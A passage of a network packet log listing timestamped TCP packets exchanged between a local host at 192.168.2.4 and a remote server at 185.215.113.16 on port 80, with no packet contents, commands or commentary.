Nov 7, 2024 04:12:27.972408056 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972414970 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972419024 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972429037 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972446918 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972465038 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972470045 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972479105 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972489119 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972497940 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972527981 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972558022 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972567081 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972585917 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972590923 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972596884 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972609043 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972614050 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972620964 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972631931 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972649097 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972654104 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972654104 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972664118 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972675085 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972677946 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972683907 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972692966 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972702026 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972712994 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972723007 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972726107 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972733974 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972738028 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972744942 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972754955 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972759008 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972789049 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972793102 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972803116 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972831964 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972837925 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972850084 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972876072 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972877979 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972888947 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972891092 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972909927 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972918034 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972924948 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972928047 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972949982 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972954988 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972960949 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972975016 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972995996 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973006964 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973054886 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973067045 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973076105 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973087072 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973097086 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973097086 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973107100 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973118067 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973126888 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973134041 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973135948 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973145008 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973155975 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973156929 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973166943 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973177910 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973191977 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973203897 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973227024 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973258972 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973269939 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973279953 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973299980 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973303080 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973314047 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973324060 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973325968 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973335028 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973345041 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973347902 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973356962 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973370075 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973386049 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973392010 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973396063 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973404884 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973416090 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973424911 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973426104 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973436117 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973453999 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973462105 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973490000 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973514080 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973524094 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973531961 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973542929 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973555088 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973562002 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973572969 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973577976 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973588943 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973593950 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973601103 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973611116 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973615885 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973627090 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973629951 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973644018 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973651886 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973654985 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973663092 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973673105 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973675966 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973685980 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973706961 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973718882 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973737955 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973777056 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973802090 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973812103 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973843098 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973881960 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973893881 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973918915 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973932981 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973942995 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973942995 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973953009 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.973972082 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.973999023 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.974479914 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.974508047 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.974518061 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.974561930 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.974567890 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.974577904 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.974589109 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.974611044 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.974626064 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.974730968 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.974798918 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.974808931 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.974826097 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.974837065 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.974843979 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.974865913 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.974889040 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.974920988 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.974930048 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.974967003 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.975054979 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.975065947 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.975087881 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.975099087 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.975100040 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.975111008 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.975120068 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.975122929 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.975133896 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.975164890 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.975296974 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.975307941 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.975322962 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.975337029 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.975354910 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.975430012 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.975460052 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.975471973 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.975474119 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.975500107 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.975511074 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.975518942 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.975522995 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.975533962 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.975542068 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.975550890 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.975563049 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.975564957 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.975574970 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.975575924 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.975590944 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.975615978 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.975617886 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.975626945 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.975642920 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.975655079 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.975663900 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.975681067 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.975832939 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.975842953 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.975878000 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.975961924 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.975977898 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.975989103 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.976001024 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.976001024 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.976011992 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.976020098 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.976049900 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.976327896 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.976337910 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.976349115 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.976366043 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.976372957 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.976386070 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.976389885 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.976402998 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.976425886 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.976453066 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.976454020 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.976476908 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.976488113 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.976497889 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.976509094 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.976519108 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.976545095 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.976619005 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.976629019 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.976639032 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.976660013 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.976670980 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.977128029 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.977152109 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.977161884 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.977169991 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.977181911 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.977199078 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.977210045 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.977221012 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.977230072 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.977247000 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.977271080 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.977314949 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.977363110 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.977372885 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.977402925 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.977406025 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.977416992 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.977436066 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.977443933 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.977456093 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.977464914 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.977466106 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.977474928 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.977479935 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.977487087 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.977492094 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.977519035 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.977523088 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.977535009 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.977545023 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.977555990 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.977586031 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.977616072 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.977627993 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.977637053 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.977657080 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.977684021 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.977710962 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.977721930 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.977732897 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.977763891 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.977776051 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.978240967 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978291988 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.978374958 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978385925 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978395939 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978406906 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978416920 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978421926 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.978427887 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978439093 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978451014 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.978457928 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.978466034 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978477001 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978482962 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.978488922 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978499889 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978513002 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978513002 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.978534937 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.978557110 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.978559971 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978570938 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978581905 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978593111 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978604078 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978605032 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.978617907 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978634119 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.978640079 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.978653908 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978665113 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978671074 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.978676081 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978683949 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.978688002 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978698969 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978707075 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978708029 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.978718042 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.978720903 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978740931 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.978744984 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978755951 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978756905 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.978780985 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.978781939 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978796959 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.978799105 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978828907 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978830099 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.978841066 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978852034 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978869915 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.978869915 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.978888035 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.978916883 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.020024061 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.020035982 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.020087004 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.050508022 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.050549984 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.050560951 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.050585032 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.050594091 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.050605059 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.050616026 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.050616026 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.050642014 CET	49762	80	192.168.2.4	185.215.113.16
